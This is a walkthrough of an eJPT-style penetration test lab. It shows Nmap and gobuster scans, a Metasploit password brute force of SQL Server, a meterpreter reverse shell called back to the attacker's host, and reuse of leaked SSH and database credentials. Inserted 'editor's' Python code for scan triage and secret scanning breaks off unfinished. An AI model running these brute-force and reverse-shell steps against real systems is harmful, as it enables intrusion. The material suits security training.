Info
Scenario
You have been engaged in a Black-box Penetration Test (172.16.64.0/24 range). Your goal is to read the flag file on each machine. On some of them, you will be required to exploit a remote code execution vulnerability in order to read the flag.
Some machines are exploitable instantly but some might require exploiting other ones first. Enumerate every compromised machine to identify valuable information that will help you proceed further into the environment.
If you are stuck on one of the machines, don't overthink and start pentesting another one.
When you read the flag file, you can be sure that the machine was successfully compromised. But keep your eyes open - apart from the flag, other useful information may be present on the system.
This is not a CTF! The flags' purpose is to help you identify if you fully compromised a machine or not.
The solutions contain the shortest path to compromise each machine. You should follow the penetration testing process covered in its entirety!
Goals
Discover and exploit all the machines on the network.
Read all flag files (one per machine)
What you will learn
How to exploit Apache Tomcat
How to exploit SQL Server
Post-exploitation discovery
Arbitrary file upload exploitation
Recommended tools
Dirb
Metasploit framework (recommended version: 5)
Nmap
Netcat
Approach
First off, I connected to the VPN and started with an Nmap scan of the entire range.
Nmap scan report for 172.16.64.101
Host is up (0.27s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7f:b7:1c:3d:55:b3:9d:98:58:11:17:ef:cc:af:27:67 (RSA)
| 256 5f:b9:93:e2:ec:eb:f7:08:e4:bb:82:d0:df:b9:b1:56 (ECDSA)
|_ 256 db:1f:11:ad:59:c1:3f:0c:49:3d:b0:66:10:fa:57:21 (ED25519)
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache2 Ubuntu Default Page: It works
9080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 172.16.64.182
Host is up (0.30s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7f:b7:1c:3d:55:b3:9d:98:58:11:17:ef:cc:af:27:67 (RSA)
| 256 5f:b9:93:e2:ec:eb:f7:08:e4:bb:82:d0:df:b9:b1:56 (ECDSA)
|_ 256 db:1f:11:ad:59:c1:3f:0c:49:3d:b0:66:10:fa:57:21 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 172.16.64.199
Host is up (0.24s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: WIN10
| NetBIOS_Domain_Name: WIN10
| NetBIOS_Computer_Name: WIN10
| DNS_Domain_Name: WIN10
| DNS_Computer_Name: WIN10
|_ Product_Version: 10.0.10586
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-03-02T12:26:47
| Not valid after: 2051-03-02T12:26:47
| MD5: cc88 5bbb d493 b6ab 7a60 0307 b01e a772
|_SHA-1: 806f 0b01 3ab5 2ba9 c848 aa82 e15d 55b4 106e 6374
|_ssl-date: 2021-03-02T17:35:42+00:00; -2s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
| ms-sql-info:
| 172.16.64.199:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| nbstat: NetBIOS name: WIN10, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:8e:48:10 (VMware)
| Names:
| WIN10<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ WIN10<20> Flags: <unique><active>
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-03-02T17:35:32
|_ start_date: 2021-03-02T12:26:45
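As an added example (editor's code, not part of the original writeup), here is a small Python parser for Nmap's normal output that turns a report like the one above into a per-host list of things worth following up: risky HTTP methods, a database port exposed to the whole subnet, a weak TLS certificate, and SMB signing not being required. The sample scan text is a constructed, trimmed copy of the output above, and the triage rules are the editor's own starting set, not anything Nmap itself reports.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt modelled on the Nmap normal output in the writeup above
# (NSE script indentation is collapsed the same way the page's copy is).
SAMPLE_SCAN = """\
Nmap scan report for 172.16.64.101
Host is up (0.27s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
9080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_ Potentially risky methods: PUT DELETE
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 172.16.64.199
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SCRIPT_RE = re.compile(r"^\|_?\s*(.*)$")  # NSE output lines start with "|" or "|_"


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str
    script_lines: list = field(default_factory=list)


@dataclass
class Host:
    address: str
    ports: list = field(default_factory=list)
    script_lines: list = field(default_factory=list)  # "Host script results:" section


def parse_nmap(text):
    """Parse Nmap normal output into Host/Port objects, keeping NSE script lines."""
    hosts, host, port = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if m := HOST_RE.match(line):
            host, port = Host(m.group(1)), None
            hosts.append(host)
        elif line == "Host script results:":
            port = None  # following script lines belong to the host, not a port
        elif host is not None and (m := PORT_RE.match(line)):
            port = Port(int(m.group(1)), m.group(2), m.group(3), m.group(4), m.group(5))
            host.ports.append(port)
        elif host is not None and (m := SCRIPT_RE.match(line)):
            (port if port is not None else host).script_lines.append(m.group(1))
    return hosts


def assess(host):
    """Editor's triage rules; returns (port_or_None, finding) tuples for one host."""
    findings = []
    for p in host.ports:
        if p.service == "ms-sql-s":
            findings.append((p.number, "SQL Server reachable from the network; restrict to app hosts"))
        if "Tomcat" in p.version:
            findings.append((p.number, "Tomcat: confirm /manager and /host-manager are not reachable"))
        for s in p.script_lines:
            if s.startswith("Potentially risky methods:"):
                findings.append((p.number, "risky HTTP methods enabled: " + s.split(":", 1)[1].strip()))
            if (m := re.search(r"Public Key bits: (\d+)", s)) and int(m.group(1)) < 2048:
                findings.append((p.number, f"TLS certificate uses a {m.group(1)}-bit key"))
            if "sha1With" in s:
                findings.append((p.number, "TLS certificate signed with SHA-1"))
    for s in host.script_lines:
        if "signing enabled but not required" in s:
            findings.append((None, "SMB signing not required"))
    return findings


def triage(text):
    """Map each scanned host address to its list of findings."""
    return {h.address: assess(h) for h in parse_nmap(text)}


if __name__ == "__main__":
    for addr, findings in triage(SAMPLE_SCAN).items():
        print(addr)
        for port, text in findings:
            print(f"  {port or 'host'}: {text}")
```

Run it against a saved `nmap -sV -sC -oN scan.txt` file by passing the file contents to `triage()`; the rule set is deliberately small so it is easy to extend with whatever your environment considers a finding.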
Apache Tomcat host
We can see one box (172.16.64.101) is running Apache Tomcat on ports 8080 and 9080, so I started gobuster against both ports.
Port 8080
kali@kali:~/ine/eJPT/blackbox1/scans$ gobuster dir -u http://172.16.64.101:8080/ -w /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt -o 101_8080
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://172.16.64.101:8080/
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/03/02 12:46:38 Starting gobuster
===============================================================
/manager (Status: 302)
[ERROR] 2021/03/02 12:54:56 [!] parse http://172.16.64.101:8080/error_log: net/url: invalid control character in URL
/host-manager (Status: 302)
===============================================================
2021/03/02 13:09:20 Finished
===============================================================
Port 9080
kali@kali:~/ine/eJPT/blackbox1/scans$ gobuster dir -u http://172.16.64.101:9080 -w /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt -o 101_9080
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://172.16.64.101:9080
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/03/02 12:46:10 Starting gobuster
===============================================================
/manager (Status: 302)
[ERROR] 2021/03/02 13:02:18 [!] parse http://172.16.64.101:9080/error_log: net/url: invalid control character in URL
/host-manager (Status: 302)
===============================================================
2021/03/02 13:34:52 Finished
===============================================================
/manager popped up pretty early on in the scan, so I fired up msfconsole and started to bruteforce username/password combinations to get in. Tried both 8080 and 9080 without any luck.
Switched to look at the SQL server host.
Jumped over to the Microsoft SQL Server box (172.16.64.199) to start bruteforcing user/pass combinations there, since I didn't get anywhere with Tomcat. Still using msfconsole:
msf6 auxiliary(scanner/mssql/mssql_login) > show options
Module options (auxiliary/scanner/mssql/mssql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /usr/share/wordlists/rockyou.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.16.64.101 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1433 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME sa no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
VERBOSE true yes Whether to print output for all attempts
msf6 auxiliary(scanner/mssql/mssql_login) > set RHOSTS 172.16.64.199
RHOSTS => 172.16.64.199
msf6 auxiliary(scanner/mssql/mssql_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/mssql/mssql_login) > run
[*] 172.16.64.199:1433 - 172.16.64.199:1433 - MSSQL - Starting authentication scanner.
[!] 172.16.64.199:1433 - No active DB -- Credential data will not be saved!
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:123456 (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:12345 (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:123456789 (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:password (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:iloveyou (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:princess (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:1234567 (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:rockyou (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:12345678 (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:abc123 (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:nicole (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:daniel (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:babygirl (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:monkey (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:lovely (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:jessica (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:654321 (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:michael (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:ashley (Incorrect: )
[+] 172.16.64.199:1433 - 172.16.64.199:1433 - Login Successful: WORKSTATION\sa:qwerty
BOOM! We got a match! Let's run mssql_enum and see what we have going on here!
msf6 auxiliary(scanner/mssql/mssql_login) > use auxiliary/admin/mssql/mssql_enum
msf6 auxiliary(admin/mssql/mssql_enum) > show options
Module options (auxiliary/admin/mssql/mssql_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1433 yes The target port (TCP)
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
msf6 auxiliary(admin/mssql/mssql_enum) > set RHOSTS 172.16.64.199
RHOSTS => 172.16.64.199
msf6 auxiliary(admin/mssql/mssql_enum) > set PASSWORD qwerty
PASSWORD => qwerty
msf6 auxiliary(admin/mssql/mssql_enum) > run
[*] Running module against 172.16.64.199
[*] 172.16.64.199:1433 - Running MS SQL Server Enumeration...
[*] 172.16.64.199:1433 - Version:
[*] Microsoft SQL Server 2014 - 12.0.2000.8 (X64)
[*] Feb 20 2014 20:04:26
[*] Copyright (c) Microsoft Corporation
[*] Express Edition (64-bit) on Windows NT 6.3 <X64> (Build 10586: ) (Hypervisor)
[*] 172.16.64.199:1433 - Configuration Parameters:
[*] 172.16.64.199:1433 - C2 Audit Mode is Not Enabled
[*] 172.16.64.199:1433 - xp_cmdshell is Enabled
[*] 172.16.64.199:1433 - remote access is Enabled
[*] 172.16.64.199:1433 - allow updates is Not Enabled
[*] 172.16.64.199:1433 - Database Mail XPs is Not Enabled
[*] 172.16.64.199:1433 - Ole Automation Procedures are Not Enabled
[*] 172.16.64.199:1433 - Databases on the server:
[*] 172.16.64.199:1433 - Database name:master
[*] 172.16.64.199:1433 - Database Files for master:
[*] 172.16.64.199:1433 - C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\master.mdf
[*] 172.16.64.199:1433 - C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\mastlog.ldf
[*] 172.16.64.199:1433 - Database name:tempdb
[*] 172.16.64.199:1433 - Database Files for tempdb:
[*] 172.16.64.199:1433 - C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\tempdb.mdf
[*] 172.16.64.199:1433 - C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\templog.ldf
[*] 172.16.64.199:1433 - Database name:model
[*] 172.16.64.199:1433 - Database Files for model:
[*] 172.16.64.199:1433 - C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\model.mdf
[*] 172.16.64.199:1433 - C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\modellog.ldf
[*] 172.16.64.199:1433 - Database name:msdb
[*] 172.16.64.199:1433 - Database Files for msdb:
[*] 172.16.64.199:1433 - C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\MSDBData.mdf
[*] 172.16.64.199:1433 - C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\MSDBLog.ldf
[*] 172.16.64.199:1433 - System Logins on this Server:
[*] 172.16.64.199:1433 - sa
[*] 172.16.64.199:1433 - ##MS_SQLResourceSigningCertificate##
[*] 172.16.64.199:1433 - ##MS_SQLReplicationSigningCertificate##
[*] 172.16.64.199:1433 - ##MS_SQLAuthenticatorCertificate##
[*] 172.16.64.199:1433 - ##MS_PolicySigningCertificate##
[*] 172.16.64.199:1433 - ##MS_SmoExtendedSigningCertificate##
[*] 172.16.64.199:1433 - ##MS_PolicyEventProcessingLogin##
[*] 172.16.64.199:1433 - ##MS_PolicyTsqlExecutionLogin##
[*] 172.16.64.199:1433 - ##MS_AgentSigningCertificate##
[*] 172.16.64.199:1433 - WIN10\AdminELS
[*] 172.16.64.199:1433 - NT SERVICE\SQLWriter
[*] 172.16.64.199:1433 - NT SERVICE\Winmgmt
[*] 172.16.64.199:1433 - NT SERVICE\MSSQL$FOOSQL
[*] 172.16.64.199:1433 - BUILTIN\Users
[*] 172.16.64.199:1433 - NT AUTHORITY\SYSTEM
[*] 172.16.64.199:1433 - fooadmin
[*] 172.16.64.199:1433 - jerry
[*] 172.16.64.199:1433 - Disabled Accounts:
[*] 172.16.64.199:1433 - ##MS_PolicyEventProcessingLogin##
[*] 172.16.64.199:1433 - ##MS_PolicyTsqlExecutionLogin##
[*] 172.16.64.199:1433 - No Accounts Policy is set for:
[*] 172.16.64.199:1433 - All System Accounts have the Windows Account Policy Applied to them.
[*] 172.16.64.199:1433 - Password Expiration is not checked for:
[*] 172.16.64.199:1433 - sa
[*] 172.16.64.199:1433 - ##MS_PolicyEventProcessingLogin##
[*] 172.16.64.199:1433 - ##MS_PolicyTsqlExecutionLogin##
[*] 172.16.64.199:1433 - fooadmin
[*] 172.16.64.199:1433 - jerry
[*] 172.16.64.199:1433 - System Admin Logins on this Server:
[*] 172.16.64.199:1433 - sa
[*] 172.16.64.199:1433 - WIN10\AdminELS
[*] 172.16.64.199:1433 - NT SERVICE\SQLWriter
[*] 172.16.64.199:1433 - NT SERVICE\Winmgmt
[*] 172.16.64.199:1433 - NT SERVICE\MSSQL$FOOSQL
[*] 172.16.64.199:1433 - fooadmin
[*] 172.16.64.199:1433 - Windows Logins on this Server:
[*] 172.16.64.199:1433 - WIN10\AdminELS
[*] 172.16.64.199:1433 - NT SERVICE\SQLWriter
[*] 172.16.64.199:1433 - NT SERVICE\Winmgmt
[*] 172.16.64.199:1433 - NT SERVICE\MSSQL$FOOSQL
[*] 172.16.64.199:1433 - NT AUTHORITY\SYSTEM
[*] 172.16.64.199:1433 - Windows Groups that can logins on this Server:
[*] 172.16.64.199:1433 - BUILTIN\Users
[*] 172.16.64.199:1433 - Accounts with Username and Password being the same:
[*] 172.16.64.199:1433 - fooadmin
[*] 172.16.64.199:1433 - Accounts with empty password:
[*] 172.16.64.199:1433 - No Accounts with empty passwords where found.
[*] 172.16.64.199:1433 - Stored Procedures with Public Execute Permission found:
[*] 172.16.64.199:1433 - sp_replsetsyncstatus
[*] 172.16.64.199:1433 - sp_replcounters
[*] 172.16.64.199:1433 - sp_replsendtoqueue
[*] 172.16.64.199:1433 - sp_resyncexecutesql
[*] 172.16.64.199:1433 - sp_prepexecrpc
[*] 172.16.64.199:1433 - sp_repltrans
[*] 172.16.64.199:1433 - sp_xml_preparedocument
[*] 172.16.64.199:1433 - xp_qv
[*] 172.16.64.199:1433 - xp_getnetname
[*] 172.16.64.199:1433 - sp_releaseschemalock
[*] 172.16.64.199:1433 - sp_refreshview
[*] 172.16.64.199:1433 - sp_replcmds
[*] 172.16.64.199:1433 - sp_unprepare
[*] 172.16.64.199:1433 - sp_resyncprepare
[*] 172.16.64.199:1433 - sp_createorphan
[*] 172.16.64.199:1433 - xp_dirtree
[*] 172.16.64.199:1433 - sp_replwritetovarbin
[*] 172.16.64.199:1433 - sp_replsetoriginator
[*] 172.16.64.199:1433 - sp_xml_removedocument
[*] 172.16.64.199:1433 - sp_repldone
[*] 172.16.64.199:1433 - sp_reset_connection
[*] 172.16.64.199:1433 - xp_fileexist
[*] 172.16.64.199:1433 - xp_fixeddrives
[*] 172.16.64.199:1433 - sp_getschemalock
[*] 172.16.64.199:1433 - sp_prepexec
[*] 172.16.64.199:1433 - xp_revokelogin
[*] 172.16.64.199:1433 - sp_resyncuniquetable
[*] 172.16.64.199:1433 - sp_replflush
[*] 172.16.64.199:1433 - sp_resyncexecute
[*] 172.16.64.199:1433 - xp_grantlogin
[*] 172.16.64.199:1433 - sp_droporphans
[*] 172.16.64.199:1433 - xp_regread
[*] 172.16.64.199:1433 - sp_getbindtoken
[*] 172.16.64.199:1433 - sp_replincrementlsn
[*] 172.16.64.199:1433 - Instances found on this server:
[*] 172.16.64.199:1433 - FOOSQL
[*] 172.16.64.199:1433 - Default Server Instance SQL Server Service is running under the privilege of:
[*] 172.16.64.199:1433 - xp_regread might be disabled in this system
[*] Auxiliary module execution completed
Nice nice. Let's just smash on with meterpreter and get a shell on this box through MSSQL.
msf6 exploit(windows/mssql/mssql_payload) > use exploit/windows/mssql/mssql_payload
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/mssql/mssql_payload) > show options
Module options (exploit/windows/mssql/mssql_payload):
Name Current Setting Required Description
---- --------------- -------- -----------
METHOD cmd yes Which payload delivery method to use (ps, cmd, or old)
PASSWORD qwerty no The password for the specified username
RHOSTS 172.16.64.199 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1433 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
URIPATH no The URI to use for this exploit (default is random)
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.64.12 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/mssql/mssql_payload) > set password qwerty
password => qwerty
msf6 exploit(windows/mssql/mssql_payload) > set RHOSTS 172.16.64.199
RHOSTS => 172.16.64.199
msf6 exploit(windows/mssql/mssql_payload) > set LHOST 172.16.64.12
LHOST => 172.16.64.12
msf6 exploit(windows/mssql/mssql_payload) > run
[*] Started reverse TCP handler on 172.16.64.12:4444
[*] 172.16.64.199:1433 - Command Stager progress - 1.47% done (1499/102246 bytes)
[*] 172.16.64.199:1433 - Command Stager progress - 2.93% done (2998/102246 bytes)
[*] 172.16.64.199:1433 - Command Stager progress - 4.40% done (4497/102246 bytes)
[*] 172.16.64.199:1433 - Command Stager progress - 5.86% done (5996/102246 bytes)
.........
.........
[*] 172.16.64.199:1433 - Command Stager progress - 95.29% done (97435/102246 bytes)
[*] 172.16.64.199:1433 - Command Stager progress - 96.76% done (98934/102246 bytes)
[*] 172.16.64.199:1433 - Command Stager progress - 98.19% done (100400/102246 bytes)
[*] 172.16.64.199:1433 - Command Stager progress - 99.59% done (101827/102246 bytes)
[*] Sending stage (175174 bytes) to 172.16.64.199
[*] 172.16.64.199:1433 - Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Meterpreter session 2 opened (172.16.64.12:4444 -> 172.16.64.199:49673) at 2021-03-02 14:07:13 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
So we own this box now!
We also find a useful file on the Desktop.
meterpreter > cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAlGWzjgKVHcpaDFvc6877t6ZT2ArQa+OiFteRLCc6TpxJ/lQFEDtmxjTcotik7V3DcYrIv3UsmNLjxKpEJpwqELGBfArKAbzjWXZE0VubmBQMHt4WmBMlDWGcKu8356blxom+KR5S5o+7CpcL5R7UzwdIaHYt/ChDwOJc5VK7QU46G+T9W8aYZtvbOzl2OzWj1U6NSXZ4Je/trAKoLHisVfq1hAnulUg0HMQrPCMddW5CmTzuEAwd8RqNRUizqsgIcJwAyQ8uPZn5CXKWbE/p1p3fzAjUXBbjB0c7SmXzondjmMPcamjjTTB7kcyIQ/3BQfBya1qhjXeimpmiNX1nnQ== rsa-key-20190313###ssh://developer:[email protected]:22#############################################################################################################################################################################################
meterpreter >
Username and password! developer:[email protected]:22
SSH onto 183 host
Let's try out the username and password we found on the SQL Server box!
kali@kali:~/ine/eJPT/blackbox1$ ssh [email protected]
The authenticity of host '172.16.64.182 (172.16.64.182)' can't be established.
ECDSA key fingerprint is SHA256:RENtJS0acPn+bv2Lw6K0XrHov6tFifkbIXQ3kh/NpeE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.16.64.182' (ECDSA) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-104-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
195 packages can be updated.
10 updates are security updates.
Last login: Sun May 19 05:36:41 2019 from 172.16.64.13
developer@xubuntu:~$
We're in! Let's kick off linpeas here while we look at the Tomcat host some more.
Back to Tomcat
Towards the end, /host-manager popped up in gobuster. Using this we try to bruteforce user/pass combos again, to see if we can get in here instead.
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set TARGETURI /host-manager/html
TARGETURI => /host-manager/html
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run
Nothing new happened here :/ Maybe it's just a rabbit hole, and we should get in through creds from the other servers?
Linpeas on .183 is done!
Nothing really interesting that I know about showed up here. There is an id_rsa file here though, which might work on the Tomcat machine?
developer@xubuntu:~/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
[key body omitted]
-----END RSA PRIVATE KEY-----
developer@xubuntu:~/.ssh$
There is an extra box on this network!
Nmap didn't catch all of the boxes on this network.
There is a host 172.16.64.140 as well, which listens on port 80.
Nothing interesting directly on that address, but running gobuster on it we find a directory called /project which has some kind of site on it.
Might be some SQL injection here, since there is a search and a newsletter signup?
After multiple gobuster sessions, we finally find a directory with some interesting files:
http://172.16.64.140/project/backup/test/
There is a file here with some DB credentials that we actually should have used on the SQL Server, but we bruteforced the sa password instead.
sdadas.txt
Driver={SQL Server};Server=foosql.foo.com;Database=;Uid=fooadmin;Pwd=fooadmin;
/var/www/html/project/354253425234234/flag.txt
As we see from the file above, there is also a mention of a flag file: http://172.16.64.140/project/354253425234234/flag.txt
Congratulations, you exploited this machine!
Now continue to others.
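Both credential finds on this engagement (the ssh:// URL padded into the id_rsa.pub comment on the SQL Server box, and the ODBC connection string in sdadas.txt with Uid and Pwd both set to fooadmin) are exactly the kind of thing a simple secrets scanner catches before a pentester does. The following Python scanner is an added example and not part of the writeup; the sample files are constructed copies in which the key body, the password and the SSH host are placeholders rather than the lab's values, and the `username reused as password` rule is the editor's addition that mirrors what mssql_enum flagged for fooadmin above.

```python
import re
from dataclasses import dataclass

# Password and user fields inside ODBC/ADO-style connection strings ("Pwd=...;").
CONN_PASSWORD_RE = re.compile(r"(?i)\b(?:pwd|password)\s*=\s*([^;\s]+)")
CONN_USER_RE = re.compile(r"(?i)\b(?:uid|user id|user)\s*=\s*([^;\s]+)")
# scheme://user:password@host, the form found in the id_rsa.pub comment.
URL_CREDS_RE = re.compile(
    r"\b(?P<scheme>[a-z][a-z0-9+.-]*)://(?P<user>[^:/@\s]+):(?P<pw>[^@\s]+)@(?P<host>[^\s/:#]+)"
)
PRIVATE_KEY_RE = re.compile(r"-----BEGIN (?:[A-Z]+ )?PRIVATE KEY-----")

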